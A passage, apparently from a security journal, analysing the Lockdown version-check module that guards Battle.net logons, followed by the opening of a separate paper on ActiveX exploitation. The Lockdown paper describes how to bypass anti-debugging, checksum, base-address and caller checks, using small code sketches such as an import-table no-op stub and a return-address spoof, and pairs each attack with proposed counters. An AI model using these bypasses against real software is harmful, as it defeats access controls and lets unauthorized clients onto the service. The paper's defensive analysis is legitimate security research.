debug registers to set traps on specific locations is sometimes known as
"setting a hardware breakpoint", as the processor's dedicated debugging
support (in-hardware) is being utilized.
Due to their obvious utility to anyone attempting to analyze or reverse
engineer the Lockdown module, the module actively attempts to disable this
debugging aid by explicitly zeroing the contents of the key debug registers in
the context of the thread executing the Lockdown module's version check
call, CheckRevision. All the requisite debug registers are cleared immediately
after the call to the CheckRevision routine in the Lockdown module is made.
This protection mechanism constitutes an anti-debugging scheme.
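In effect, the module does the equivalent of the following to its own
thread context. This is an abstract model only; the real code would
operate on a CONTEXT structure via the Get/SetThreadContext Win32 APIs
rather than a dictionary.

```python
def clear_hardware_breakpoints(context):
    """Model of zeroing the x86 debug registers in a thread context,
    disabling any hardware breakpoints a debugger has set."""
    for reg in ("Dr0", "Dr1", "Dr2", "Dr3", "Dr6", "Dr7"):
        # DR0-DR3 hold breakpoint addresses; DR7 enables them;
        # DR6 reports debug status.
        context[reg] = 0
    return context

# A debugger had armed a breakpoint at an address of interest...
ctx = {"Dr0": 0x00401000, "Dr7": 0x1, "Eip": 0x00402000}
clear_hardware_breakpoints(ctx)
# ...which is now silently disarmed; other state is untouched.
assert ctx["Dr0"] == 0 and ctx["Dr7"] == 0 and ctx["Eip"] == 0x00402000
```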
2.2) Memory Checksum Performed on the Lockdown Module
The Lockdown module, contrary to the behavior of its predecessor, implements
a checksum of several key game executable files in-memory instead of on-disk.
In addition to the checksum over certain game executables, the Lockdown
module includes itself in the list of modules to be checksumed. This provides
several immediate benefits:
1. Attempts to set conventional software breakpoints on routines inside the
Lockdown module will distort the result of the operation, frustrating
reverse engineering attempts. This is due to the fact that so-called
software breakpoints are implemented by patching the instruction at the
target location with a special instruction (typically `int 3') that causes
the processor to break into the debugger. The alteration to the module's
executable code in memory causes the checksum to be distorted, as the `int 3'
opcode is checksumed instead of the original opcode.
2. Attempts to bypass other protection mechanisms in the Lockdown module are
made more difficult, as an untrusted process that is attempting to cause the
Lockdown module to produce correct results via patching out certain other
protection mechanisms will, simply by virtue of altering Lockdown code
in-memory, inadvertently alter the end result of the checksum operation. The
success of this aspect of the memory checksum protection is related to the
fact that the Lockdown module attempts to disable hardware breakpoints as
well. These two protection mechanisms thus complement each other in a strong
fashion, such that a naive attempt to compromise one of the protection
schemes would usually be detected by the other scheme. In effect, the result
is a rudimentary "defense in depth" approach to software protection schemes
that is the hallmark of most relatively successful protection schemes.
3. The inclusion of the version check module itself in the result of the output
of the checksum is entirely new to the version check and client
authentication system, and as such poses an additional, unexpected "speed
bump" to persons attempting to reimplement the Lockdown algorithm in their
own code.
This protection mechanism has characteristics of both an anti-debugging,
anti-hack, and anti-emubot system.
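The interplay between software breakpoints and the self-checksum can be
demonstrated with a toy example. The real Lockdown checksum algorithm is
not public, so a simple multiplicative checksum and made-up opcode bytes
stand in here.

```python
INT3 = 0xCC  # opcode a debugger writes to plant a software breakpoint

def toy_checksum(code):
    """Stand-in for Lockdown's in-memory checksum over its own code."""
    total = 0
    for byte in code:
        total = (total * 33 + byte) & 0xFFFFFFFF
    return total

module_code = bytearray(b"\x55\x8b\xec\x83\xec\x40\x53\x56")  # fake code
clean = toy_checksum(module_code)

# Setting a breakpoint patches one byte of the module in memory...
module_code[3] = INT3
# ...so the self-checksum no longer matches, betraying the tampering.
assert toy_checksum(module_code) != clean
```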
2.3) Hardcoding of Module Base Addresses
As mentioned previously, the Lockdown module now implements a checksum over
game executables in-memory instead of on-disk. Taking advantage of this
change, the Lockdown module can hardcode the base address of the main process
executable at the default address of 0x00400000. This is safe because no
Blizzard game executable includes base relocation information, and as a result
will never change from this base address.
By virtue of hardcoding this address, it becomes more difficult for an
untrusted process to successfully call the Lockdown module. Unless the
programmer is particularly clever, he or she may not notice that the Lockdown
module is not actually performing a checksum over the main executable for the
desired Blizzard game, but instead the main executable of the untrusted process
(the default base address for executables produced by the Microsoft linker is the
same 0x00400000 value used in Blizzard's main executables comprising their
game clients).
While it is possible to change the base address of a program at link-time,
which could be done by a third-party process in an attempt to make it possible
to map the desired Blizzard main executable at the 0x00400000 address, it is
difficult to pull this off under Windows NT. This is because the 0x00400000
address is low in the address space, and the default behavior of the kernel's
memory manager is to find new addresses for memory allocations starting from
the bottom of the address space. This means that in virtually all cases, a
virgin Win32 process will already have an allocation (usually one of the shared
sections used for communication with CSRSS in the author's experience) that is
overlapping the address range required by the Lockdown module for the main
executable of the Blizzard game for which a challenge response is being
computed. While it is possible to change this behavior in the Windows NT
memory manager and cause allocations to start at the top of the address space
and search downwards, this is not the default configuration and is also a
relatively not-well-known kernel option. The fact that every affected user's
system would need to be reconfigured to change the default allocation search
preference before an untrusted process could reliably map the desired
Blizzard game executable makes this approach relatively painful for a
would-be attacker.
The Lockdown module also ensures that the return value of the
GetModuleHandleA(0) Win32 API corresponds to 0x00400000, indicating that the
main process image is based at 0x00400000 as far as the loader is concerned.
The restriction on the base address of the game main executable module has the
unfortunate side effect that it will not be possible to take advantage of
Windows Vista's ASLR attack surface reduction capabilities, negatively
impacting the resistance of Blizzard games to certain classes of exploitation
that might impact the security of users.
This protection mechanism is primarily considered to be an anti-emubot scheme,
as it is designed to prevent an untrusted process from successfully
calling the Lockdown module.
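To make the double-check concrete, here is a minimal, portable sketch. The helper name and the idea of passing in the loader-reported base are illustrative assumptions; only the 0x00400000 constant comes from the module itself.

```c
#include <stdint.h>

/* Hypothetical sketch of the consistency check described above. The value
 * passed in stands for what GetModuleHandleA(0) would report; the function
 * name is made up for illustration. */
#define LOCKDOWN_HARDCODED_BASE 0x00400000u

int base_address_check(uint32_t loader_reported_base)
{
    /* the module both hardcodes 0x00400000 and cross-checks the loader */
    return loader_reported_base == LOCKDOWN_HARDCODED_BASE;
}
```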
2.4) Video Memory Checksum
Another previously nonexistent component of the version check algorithm that is
introduced by the Lockdown module is a checksum over the video memory of the
process calling the Lockdown module. At the point in time where the module
is invoked by the Blizzard game, the portion of video memory checksummed should
correspond to part of the "Battle.net" banner in the log on screen for the
Blizzard game. The Lockdown module is currently only implemented for
so-called "legacy" game clients, otherwise known as clients that use Battle.snp
and the Storm Network Provider system for multiplayer access. This includes
all Battle.net-capable Blizzard games ranging from Diablo I to Starcraft and
Warcraft II: BNE. Later games, such as Diablo II, are not supported by the
Lockdown module.
This represents an additional non-trivial challenge to a would-be attacker.
Although the contents of the video memory to be checksummed are static, the way
that the Lockdown module retrieves the video memory pointers is through an
obfuscated call to several internal Storm routines (SDrawSelectGdiSurface,
SDrawLockSurface, and SDrawUnlockSurface) that rely on a non-trivial amount of
internal state initialized by the Blizzard game during startup. This makes the
use of the internal Storm routines unlikely to simply work "out of the box" in
an untrusted process that has not gone to all the trouble to initialize the
Storm graphics subsystem and draw the appropriate data on the Storm video
surfaces.
This protection mechanism is primarily considered to be an anti-emubot scheme,
as it is designed to prevent an untrusted process from successfully
calling the Lockdown module.
2.5) Multiple Flavors of the Lockdown Module
The original "ver" module scheme pioneered a system wherein there were multiple
downloadable flavors of the version check module to be used by a client. The
Battle.net server sends the client a tuple of (version check module filename,
checksum formula and initialization parameters, version check module timestamp)
that is used in order to version (and download, if necessary) the latest copy
of the version check module. This mechanism provides for the possibility that
the Battle.net server could support multiple "flavors" of version check module
that could be distributed to clients in order to increase the amount of work
required by anyone seeking to reimplement the version check and authentication
system.
The original "ver" module and associated authentication scheme in fact utilized
such a scheme of multiple "ver" modules, and the Lockdown scheme expands upon
this trend. In the original system, there were 8 possible modules to choose
from; the Lockdown system, by contrast, expands this to a set of 20
possibilities. However, the version check modules in both systems are still
very similar to one another. In both systems, each module has its own unique
key (a 32-bit value in the "ver" system, and a 64-bit value in the Lockdown
system) that is used to influence the result of the version check checksum (it
should be noted that in the Lockdown system, the actual Lockdown module
itself is in essence a second "key", as the added checksum over the module
represents an additional adjustment to the final checksum result that changes
with each Lockdown module). This single difference is disguised by other
minor, superficial alterations to each module flavor; there are slight
differences by which module base addresses are retrieved, for instance, and
there are also other superficial differences that relate to differences like
code being moved between functions or functions being re-arranged in the final
binary in order to frustrate a simple "diff" of two Lockdown modules as
being informative in revealing the functional differences between the said two
modules.
This protection mechanism is perhaps best classed as an anti-analysis scheme,
as it attempts to create more work for anyone attempting to reverse engineer
the authentication system as a whole.
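The effect of the per-flavor key and the module self-checksum can be sketched as follows. This is emphatically not Blizzard's actual algorithm; the FNV-1a-style mixing and the way the two "keys" are folded in are assumptions made purely for illustration.

```c
#include <stdint.h>
#include <stddef.h>

/* Illustrative sketch only, not Blizzard's algorithm: a checksum whose
 * result is perturbed both by a per-flavor 64-bit key and by a checksum over
 * the module's own bytes (the "second key" effect described above). The
 * FNV-1a-style mixing constants are assumptions. */
uint64_t fold_bytes(uint64_t state, const uint8_t *p, size_t n)
{
    for (size_t i = 0; i < n; i++)
        state = (state ^ p[i]) * 0x100000001B3ULL;  /* xor, then odd multiply */
    return state;
}

uint64_t flavored_checksum(const uint8_t *data, size_t data_len,
                           const uint8_t *module_image, size_t module_len,
                           uint64_t flavor_key)
{
    /* the per-flavor 64-bit key seeds the running state... */
    uint64_t sum = fold_bytes(flavor_key, data, data_len);
    /* ...and a checksum of the module image adjusts the final result */
    return sum ^ fold_bytes(0xCBF29CE484222325ULL, module_image, module_len);
}
```

Because each per-byte step is invertible (xor followed by multiplication by an odd constant), two different flavor keys, or two different module images, are guaranteed to yield two different results over the same input.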
2.6) Authenticity Check Performed on Lockdown Module Caller
An additional new protection scheme introduced in the Lockdown module is a
rudimentary check on the authenticity of the caller of the module's export,
the CheckRevision routine. Specifically, the module attempts to ascertain
whether the return address of the call to the CheckRevision routine points to a
code location within the Battle.snp module. If the return pointer for the call
to CheckRevision is not within the expected range, then an error is
deliberately introduced into the checksum calculations, ultimately resulting in
the result returned by the Lockdown module becoming invalidated.
3) Attacks (and Counter-Attacks) on the Lockdown System
Though the Lockdown module introduces a number of new defensive mechanisms
that attempt to thwart would-be attackers, these systems are far from
fool-proof. There are a number of ways that these defensive systems could be
attacked (or subverted) by a would-be attacker who wishes to pass the version
and authentication check in the context of a non-genuine client for purposes of
logging on to Battle.net. In addition, there are also a variety of different
ways by which these proposed attacks could be thwarted in a future update to
the version check and authentication system.
3.1) Interception of SetThreadContext
As previously described, the Lockdown modules attempt to disable the use of
the processor's complement of debug registers in order to make it difficult
to utilize so-called hardware breakpoints during the process of reverse
engineering or analyzing a Lockdown module. This scheme is, at present,
relatively easily compromised, however.
There are several possible attacks that could be used:
1. Hook the SetThreadContext API and block attempts to disable debug registers
(programmatic).
2. Patch the import address table entry for SetThreadContext in the Lockdown
module to point to a custom routine that does nothing (programmatic).
3. Patch the Lockdown module instruction code to not call SetThreadContext in
the first place (programmatic). However, this approach is considered to
be generally untenable, due to the memory checksum protection scheme.
4. Set a conditional breakpoint on `kernel32!SetThreadContext' that re-applies
the hardware breakpoint state after the call, or simply alters execution
flow to immediately return (debugger).
Depending on whether the attacker wants to make programmatic alterations to the
behavior of the Lockdown module via hardware breakpoints, or simply wishes
to observe the behavior of the module in the debugger unperturbed, there are
several options available.
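Attack 2 above can be sketched portably by modeling the import address table as a plain table of function pointers; all names here are hypothetical, and a real attack would patch the PE import table of the loaded module in memory instead.

```c
#include <stddef.h>

/* Sketch of attack 2: the import address table is modeled as a plain struct
 * of function pointers, and the SetThreadContext entry is redirected to a
 * stub that reports success but does nothing. All names are illustrative. */
typedef int (*set_thread_context_fn)(void *thread, const void *context);

struct fake_iat {
    set_thread_context_fn set_thread_context;
};

/* stand-in for the real API: pretend its side effect clears debug registers */
int g_debug_registers_cleared = 0;

int real_set_thread_context(void *thread, const void *context)
{
    (void)thread; (void)context;
    g_debug_registers_cleared = 1;   /* the side effect the attacker suppresses */
    return 1;
}

/* the attacker's replacement: succeed without touching anything */
int noop_set_thread_context(void *thread, const void *context)
{
    (void)thread; (void)context;
    return 1;
}

/* what the protected module would do through its (patched or unpatched) IAT */
int lockdown_disable_breakpoints(struct fake_iat *iat)
{
    return iat->set_thread_context(NULL, NULL);
}
```

After the pointer swap, the protected module still sees a successful return value, but the debug registers are left untouched.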
The suggested counters include techniques such as the following:
1. Verify that the debug registers were really cleared. However, this could
simply be patched out as well. More subtle would be to include the value
of several debug registers in the checksum calculations, but this would also
be fairly obvious to attackers due to the fact that debug registers cannot be
directly accessed from user mode and require a call to Get/SetThreadContext,
or the underlying NtGet/SetContextThread system calls.
2. Include additional calls to disable debug register usage in different
locations within the Lockdown module. To be most effective, these would
need to be inlined and use different means to set the debug register state.
For example, one location could use a direct import, another could use a
GetProcAddress dynamic import, a third could manually walk the EAT of
kernel32 to find the address of SetThreadContext, and a fourth could make
a call to NtSetContextThread in ntdll, and a fifth could disassemble the
opcodes comprising NtSetContextThread, determine the system call ordinal,
and make the system call directly (e.g. via `int 2e'). The goal here is to
add additional work and eliminate "single points of failure" from the
perspective of an attacker seeking to disable the anti-debugging feature.
Note that the direct system call approach will require additional work in
order to function under Wow64 (e.g. x64 computers running native Windows
x64).
3. Verify that all IAT entries corresponding to kernel32 actually point to the
same module in-memory. This is risky, though, as in some cases (such as when
the Microsoft application compatibility layer module is in use), these APIs
may be legitimately detoured.
3.2) Use of Hardware Breakpoints
Assuming an attacker can compromise the anti-debugging protection scheme, then
he or she is free to make clever use of hardware breakpoints to disable other
protection systems (such as hardcoded base addresses of modules, checks on the
authenticity of a CheckRevision caller, and so forth) by setting execute fetch
breakpoints on choice code locations. Then, the attacker could simply alter
the execution context when the breakpoints are hit, in order to bypass other
protection mechanisms. For example, an attacker could set a read breakpoint
on the hardcoded base address for the main process image inside the Lockdown
module, and change the base address accordingly. The attacker would also
have to patch GetModuleHandleA in order to complete this example attack.
Suggested counters to attacks based on hardware breakpoints include:
1. Validation of the vectored exception handler chain, which might be used to
intercept STATUS_SINGLE_STEP exceptions when hardware breakpoints are hit.
This is risky, as there are legitimate reasons for there to be "foreign"
vectored exception handlers, however.
2. Checks to stop debuggers from attaching to the process, period. This is not
considered to be a viable solution since there are a number of legitimate
reasons for a debugger to be attached to a process, many of them which may
be unknown completely to the end user (such as profilers, crash control and
reporting systems, and other types of security software). Attempting to
block debuggers may also prevent the normal operation of Windows Error
Reporting or a preconfigured JIT debugger in the event of a game crash,
depending on the implementation used. Ways of detecting debuggers include
calls to IsDebuggerPresent, NtQueryInformationProcess(...ProcessDebugPort..),
checks against NtCurrentPeb()->BeingDebugged, and so forth.
3. Duplication of checks (perhaps in slightly altered forms) throughout the
execution of the checksum implementation. It is important for this
duplication to be inline as much as possible in order to eliminate single
points of failure that could be used to short-circuit protection schemes by
an attacker.
4. Strengthening of the anti-debugging mechanism, as previously described.
3.3) Main Process Image Module Base Address Restriction
An attacker seeking to execute the Lockdown module in an untrusted process
would need to bypass the restrictions on the base address of the main process
image. The most likely approach to this would be a combination attack, whereby
the attacker would use something like a set of hardware breakpoints to alter
the hardcoded restrictions on module base addresses, and import table or code
patch style hooks on the GetModuleHandleA API in order to defeat the secondary
check on the module base address for the main executable image.
Another approach would be to simply create the main executable image as a
process, suspended, and then either create a new thread in the process or
assume control of the initial thread in order to execute the Lockdown module.
This gets the would-be attacker out of having to patch checks in the module, as
there is currently no defense against this case implemented in the module.
In order to strengthen this protection mechanism, the following approaches
could be taken:
1. Manually traverse the loaded module list (and examine the PEB) in order to
validate that the main process image is really at 0x00400000. All of these
mechanisms could be compromised, but checking each one creates additional
work for an attacker.
2. Verify that the game has initialized itself to some extent. This would
make the approach of creating the game process suspended more difficult. It
would also otherwise make the use of the Lockdown module in an untrusted
process more difficult without tricking the module into believing that it is
running in an initialized game process. Determining how the game is
initialized is outside the scope of this paper, although an approach similar
to the current one, based on a checksum of Storm video memory (though with
more "redundancy", or an additional matrix of requirements for a legitimate
game process), could serve as a starting point.
3.4) Minor Functional Differences Between Lockdown Module Flavors
Presently, an attacker needs to implement all flavors of the Lockdown module
in order to be assured of a successful connection to Battle.net. However,
even with the 20 possibilities now available, this is still not difficult due
to the minor functional differences between the different Lockdown flavors.
Moreover, it is trivially possible to find the "magic" constants that constitute
the only functional differences between each flavor of Lockdown.
In the author's tests, two pattern matches and a small 200-line C program were
all that were necessary to programmatically identify all of the magical
constants that represent the functional differences between each flavor of
Lockdown module, in a completely automated fashion. In fact, the author would
wager that it took more time to implement all 20 different flavors of Lockdown
modules than it took to devise and implement a rudimentary pattern matching
system to automagically discover all 20 magical constants from the set of 20
Lockdown module flavors. Clearly, this is not desirable from the standpoint
of effort put in to the protection scheme vs difficulty in attacking it.
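A pattern-matching pass of the kind described might be built on a wildcard byte scanner like the following sketch; the pattern encoding, with 0x100 meaning "any byte", is an assumption for illustration.

```c
#include <stdint.h>
#include <stddef.h>

/* Sketch of a wildcard byte-pattern scanner of the sort that could locate
 * each flavor's magic constant. Pattern elements are uint16_t so that the
 * out-of-range value 0x100 can mean "match any byte". */
#define PAT_ANY 0x100

long find_pattern(const uint8_t *buf, size_t buf_len,
                  const uint16_t *pat, size_t pat_len)
{
    if (pat_len == 0 || pat_len > buf_len)
        return -1;
    for (size_t i = 0; i + pat_len <= buf_len; i++) {
        size_t j = 0;
        while (j < pat_len &&
               (pat[j] == PAT_ANY || buf[i + j] == (uint8_t)pat[j]))
            j++;
        if (j == pat_len)
            return (long)i;   /* offset of the first match */
    }
    return -1;
}
```

Once, say, a `mov eax, imm32` site surrounding the constant has been matched, the wildcard bytes at the match offset are the candidate constant for that flavor.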
In order to address these weaknesses, the following steps could be implemented:
1. Implement true, major functional differences between Lockdown flavors.
Instead of using a single constant value that is different between each
flavor (probably a preprocessor constant), implement other,
real functional differences. Otherwise, even with a number of different
"non-functional" differences between module flavors, a pattern-matching
system will be able to quickly locate the different constants for each
module after a human attacker has discovered the constant for at least one
module flavor.
2. Avoid using quick-to-substitute constants as the "meat" of the functional
differences between flavors. While these are convenient from a development
perspective, they are also convenient from an attacker perspective. If a
bit more time were spent from a development perspective, attackers could be
made to do real analysis of each module separately in order to determine the
actual functional differences, greatly increasing the amount of time that is
required for an attacker to defeat this protection scheme.
3.5) Spoofed Return Address for CheckRevision Calls
Due to how the x86 architecture works, it is trivially easy to spoof the return
address pointer for a procedure call. All that one must do is push the spoofed
return address on the stack, and then immediately execute a direct jump to the
target procedure (as opposed to a standard call).
As a result, it is fairly trivial to bypass this protection mechanism at
run-time. One need only search for a `ret' opcode in the code space of the
Battle.snp module in memory, and use the technique described previously to
simply "bounce" the call off of Battle.snp via the use of a spoofed return
address. To the Lockdown module, the call will appear to originate from the
context of Battle.snp, but in reality the call will immediately return from
Battle.snp to the real caller in the untrusted process.
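The trick is x86-specific, so the pseudo-assembly appears only in comments below; the C code simulates just the observable effect on a return-address range check, with all names and addresses made up.

```c
#include <stdint.h>

/* The x86 trick itself, shown as pseudo-assembly:
 *
 *     push offset ret_gadget   ; spoofed return address: a `ret` in Battle.snp
 *     jmp  CheckRevision       ; direct jump instead of a call
 *
 * CheckRevision sees ret_gadget as its return address and the range check
 * passes; on return, the `ret` gadget bounces execution straight back to the
 * attacker. Only the range check is simulated here, with the "return
 * address" passed in as a plain value. */
int return_address_in_snp(uintptr_t retaddr,
                          uintptr_t snp_base, uintptr_t snp_end)
{
    return retaddr >= snp_base && retaddr < snp_end;
}
```

A genuine caller inside Battle.snp passes the check, an untrusted caller fails it, and a spoofed address pointing at a `ret` gadget inside the range passes just the same.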
To counter this, the following could be attempted:
1. Verify two return addresses deep, although due to the nature of the x86
calling conventions (at least stdcall and fastcall, the two used by
Blizzard code frequently), it is not guaranteed that four bytes past the
return address will be a particularly meaningful value.
2. Verify that the return address does not point directly to a `ret', `jmp',
`call' or similar instruction, assuming that current Battle.snp variations do
not use such patterns in their call to the module. This only slightly raises
the bar for an attacker, though; he or she would only need to pick a more
specific location in Battle.snp through which to stage a call, such as the
actual location used in normal calls to the Lockdown module.
3.6) Limited Pool of Challenge/Response Tuples
Presently, the Battle.net servers contain a fairly limited pool of possible
challenge/response pairs for the version check and authentication system.
Observations suggest that most products have a pool of around one thousand
values that can be sent to clients. This has been used against Battle.net in
the past, which was countered by an increase to 20000 possible values for
several Battle.net products. Even with 20000 possible values, though, it is
still possible to capture a large number of logon attempts over time and build
a lookup table of possible values. This is an attractive option for an
attacker, as he or she need only perform passive analysis over a period of time
in order to construct a database capable of logging on to Battle.net with a
fairly high success rate. Given the relative infrequency of updates to the
pool of version check values (typically once per patch), this is considered to
be a fairly viable method for an attacker to bypass the version check and
authentication system.
This limitation could easily be addressed by Blizzard, however, such as through
the implementation of one or more of the below suggestions:
1. Periodically rotate the set of possible version check values so as to ensure
that a database of challenge/response pairs would quickly expire and need to
be rebuilt. Combined with a large pool of possible values, this approach
would greatly reduce the practicality of this attack. Unfortunately, the
author suspects that this would require manual intervention each time the
pools were to be rotated on the part of Blizzard in the current Battle.net
server implementation.
2. Implement dynamic generation of pool values at runtime on each Battle.net
server. This would require the server to have access to the requisite client
binaries, but is not expected to be a major challenge (especially since the
author suspects that Battle.net is powered by Windows already, which would
allow the existing Lockdown module code to be cleaned up and repackaged for
use on the server as well). This could be implemented as a pool of possible
values that is simply stirred every so often; new challenge/response values
need not necessarily be generated on each logon attempt (and doing so would
have undesirable performance implications in any case).
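The passive lookup-table attack described earlier in this section can be sketched as follows; the table size and field shapes are assumptions (the text suggests a real pool on the order of 20000 values).

```c
#include <stdint.h>
#include <stddef.h>
#include <string.h>

/* Sketch of the passive challenge/response database. A small fixed table is
 * used to keep the sketch simple; field shapes are assumptions. */
#define MAX_PAIRS 1024

struct cr_pair {
    char     challenge[64];   /* challenge parameters as observed on the wire */
    uint32_t response;        /* checksum previously seen for that challenge */
};

struct cr_db {
    struct cr_pair pairs[MAX_PAIRS];
    size_t count;
};

/* record one observed pair; returns 0 when the table is full */
int db_record(struct cr_db *db, const char *challenge, uint32_t response)
{
    if (db->count >= MAX_PAIRS)
        return 0;
    strncpy(db->pairs[db->count].challenge, challenge,
            sizeof db->pairs[db->count].challenge - 1);
    db->pairs[db->count].challenge[sizeof db->pairs[db->count].challenge - 1] = '\0';
    db->pairs[db->count].response = response;
    db->count++;
    return 1;
}

/* answer a later challenge from the table; returns 0 on a miss */
int db_lookup(const struct cr_db *db, const char *challenge, uint32_t *out)
{
    for (size_t i = 0; i < db->count; i++) {
        if (strcmp(db->pairs[i].challenge, challenge) == 0) {
            *out = db->pairs[i].response;
            return 1;
        }
    }
    return 0;
}
```

The attacker's success rate is simply the fraction of server challenges already present in the table, which is why periodic rotation of the pool would be so effective against this approach.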
4) Conclusion
Although the Lockdown module and associated authentication system represent
a major break in Blizzard's ongoing battle against non-genuine Battle.net
client software, there are still many improvements that could be made in a
future release of the version check and authentication system which would fit
within the constraints imposed on the version check system, and still pose a
significant challenge to an adversary attempting to spoof Battle.net logons
using non-genuine clients. The author would encourage Blizzard to consider
and implement enhancements akin to those described in this paper, particularly
protections that overlap and complement each other (such as the debug register
clearing and memory checksum schemes).
In the vein of improving the Lockdown system, the author would like to stress
the following principles as especially important in creating a system that is
difficult to defeat and yet still workable and viable from a development and
deployment perspective:
- Defense in depth with respect to the various protection mechanisms in place
within the module is a must. Protection systems need to be designed to
complement and reinforce each other, such that an attacker must defeat a
number of layers of protection schemes for any one significant attack to
succeed to the point of being a break in the system.
- Countermeasures intended to frustrate reverse engineering or easy duplication
of critical algorithms need to be viewed in the light of what an adversary
might do in order to 'attack' (or duplicate, re-implement, or whatnot) a
'guarded' (or otherwise important) algorithm or section of code. For
example, an attacker could ease the work of reimplementing parts of an
algorithm or function of interest by wholesale copying of assembler code
into a different module, or by loading an "authentic" module and making
direct calls into internal functions (or the middle of internal functions) in
an effort to bypass "upstream" protection checks. Keeping with this line of
thinking, it would be advisable to interleave protection checks with code
that performs actual useful work to a certain degree, such that it is less
trivial for an adversary to bypass protection checks that are entirely done
"up front" (leaving the remainder of a secret algorithm or function
relatively "vulnerable", if the check code is skipped entirely).
- Countermeasures intended to create "time sinks" for an adversary need to be
carefully designed such that they are not easily bypassed. For instance, in
the current Lockdown module implementation, there are twenty flavors of the
Lockdown module; yet, in this implementation, it is trivially easy for an
adversary to discover the differences (in a largely programmatic fashion),
making this "time sink" highly ineffective, as the time for an adversary to
breach it is likely much less than the time for the original developers to
have created it.
- Measures that depend on external, imported APIs are often relatively easy for
an attacker to quickly pinpoint and disable. For example, the method by which
debug register breakpoints are disabled by the Lockdown module is
immediately obvious to any adversary who is even the least bit familiar
with the Win32 API (which must be assumed). In some cases (such as with the
debug register breakpoint clearing code), this cannot be avoided, but in
others (such as validation of module base addresses), the same effect could
be potentially implemented by use of less-obvious approaches (for example
manually traversing the loaded module list by locating the PEB and the
loader data structures from the backlink pointer in the current thread's
TEB). The author would encourage the developers of additional defensive
measures to reduce dependencies on easily-noticeable external APIs as much as
possible (balanced, of course, against the need for maintainable code that
executes on all supported platforms). In some instances, such as the manual
resolution of Storm symbols, the current system does do a fair job of
avoiding easily-detectable external API use.
All things considered, the Lockdown system represents a major step forward in
the vein of guarding Battle.net from unauthorized clients. Even so, there is
still plenty of room for improvements in potential future revisions of the
system. The author hopes that this article may prove useful in the
strengthening of future defensive systems, by virtue of a thorough accounting
of the strengths and weaknesses in the current Lockdown module (and pointed
suggestions as to how to repair certain weaker mechanisms in the current
implementation).

ActiveX - Active Exploitation
01/2008
warlord
warlord@nologin.org
http://www.nologin.org
Share what I know, learn what I don't
1) Foreword
First of all, I'd like to explain what this paper is all about, and
especially, what it is not. A few months ago I got into the technical details
of ActiveX for the first time. Prior to this point I only had some vague
ideas and a general understanding of what it is and how it works. What I did
first is probably quite obvious: I googled. To my surprise though, I could
not find a single paper discussing ActiveX and how to exploit it. My next step
was to contact some generally smart and knowledgable friends to harvest the
required information from them. I was even more surprised to find that some of
the most skilled people out there lacked the same knowledge that I did.
Perhaps it's our common background, coming from the Unix/Linux world, but
whatever the reason, I had to work to collect the information I now possess.
But still, I feel like I'm the one-eyed man explaining what the world looks
like to the blind.
The fact that there are tons of ActiveX exploits on Milw0rm suggests that the
knowledge is out there by now. I wonder why no one took the time to write it
all up so the less knowledgeable may get into this theater as well.
well. It's the intention of this paper to fill this gap. If you already know
everything about ActiveX, if you've found your own 0day and exploited it
successfully, I probably can't teach you any new tricks. Everyone else I
invite to read on.
2) Introduction
ActiveX[1] is a Microsoft technology introduced in 1996 and based on
the Component Object Model (COM) and Object Linking and Embedding (OLE)
technologies. The intention of COM has been to create easily reusable pieces of
code by creating objects that offer interfaces which can be called by other
COM objects or programs. This technology is widely used for what
Microsoft calls ActiveX[2] which represents the integration of COM
into Internet Explorer. This integration offers the ability to interface
with Windows as well as third-party applications with the MS browser. This
allows for the easy extension of functionality in the Internet Explorer by
giving software developers the ability to create complex applications which
can interface with websites through the browser.
There are various ways for an ActiveX control to end up on any given machine.
Besides all the controls which are part of IE or the operating system,
programs may install and register ActiveX controls of their own to offer a
diverse set of functions in IE. Another way of installing a new control is
through web sites themselves. Depending on Internet Explorer security
settings, a website may try to instantiate a control, for example Shockwave
Flash, and failing to do so may prompt the user to install the Shockwave Flash
ActiveX control.
Security issues seem to be a constant problem with ActiveX controls.
In fact, it seems most vulnerabilities in Windows nowadays are actually due to
poorly-written third-party controls which allow malicious websites to exploit
buffer overflows or abuse command injection vulnerabilities. Quite often
these controls give the impression that their authors never realized their
code can be instantiated from a remote website.
In the following chapters, methods to find, analyze, and exploit bugs in
ActiveX controls will be presented to the reader.
3) Control and functionality enumeration
Any given Windows installation is likely to have a significant number of
registered COM objects. For the purpose of this paper, however, we are only
interested in controls which may be instantiated from a website. Quite a
number of the following details are taken out of the excellent "The Art
of Software Security Assessment"[3], a book I strongly recommend to
anyone interested in application security.
ActiveX controls are usually, but not always, instantiated by passing their
CLSID to CoCreateInstance. The respective class identifier (CLSID) is used as
a unique value which is associated with each control in order to distinguish
it from its peers. A list of all the existing CLSIDs on a given Windows
installation can be found in the registry in HKEY_CLASSES_ROOT\CLSID, which
actually is nothing but an alias to HKEY_LOCAL_MACHINE\Software\Classes\CLSID.
Within the CLSID key there are thousands of different class identifiers, all
of them specifying ActiveX controls. However, only a subset of those can be
instantiated by a website. Controls marked as safe for scripting are granted
this ability. To determine whether a certain control has this ability, it has
to be part of the respective category. Specifically, the category can be
found in the registry in the form: HKEY_CLASSES_ROOT\CLSID\<control
clsid>\Implemented Categories. If a control is safe for scripting it may
indicate this by having a subkey with the GUID
7DD95801-9882-11CF-9FA9-00AA006C42C4. Similarly, the 'safe for initialization'
category is listed in the same location, but with a slightly different GUID.
Its value is 7DD95802-9882-11CF-9FA9-00AA006C42C4.
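Once the subkeys under "Implemented Categories" have been enumerated, the category test reduces to a GUID membership check. A portable sketch follows, with the registry walk omitted and the control's category GUIDs passed in as strings; the helper is hypothetical, but the GUID values are the ones quoted above.

```c
#include <string.h>
#include <stddef.h>

/* Portable sketch of the category test. A real implementation would
 * enumerate the subkeys of HKCR\CLSID\<clsid>\Implemented Categories; here
 * the implemented category GUIDs are simply passed in as strings. */
#define CAT_SAFE_FOR_SCRIPTING "7DD95801-9882-11CF-9FA9-00AA006C42C4"
#define CAT_SAFE_FOR_INIT      "7DD95802-9882-11CF-9FA9-00AA006C42C4"

int has_category(const char **cats, size_t n, const char *wanted)
{
    for (size_t i = 0; i < n; i++)
        if (strcmp(cats[i], wanted) == 0)
            return 1;
    return 0;
}
```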
In the end though, not being part of these categories doesn't necessarily mean
that a control cannot be called from IE. The component may dynamically report
itself as being safe for scripting when it is instantiated through IE. The
only surefire way is to try and instantiate a control and see if it can be
used. Axman[5] is an ActiveX fuzzer written by HD Moore which can automate this
check for all of the different CLSIDs on a system. Another tool to enumerate
the controls in question is iDefense's ComRaider[4], another ActiveX fuzzer,
which has the ability to build a database of controls that IE should be able
to instantiate.
3.1) ProgIDs
Besides the long and rather hard to memorize CLSID there is often a second
way of instantiating a certain control. This can be accomplished through the
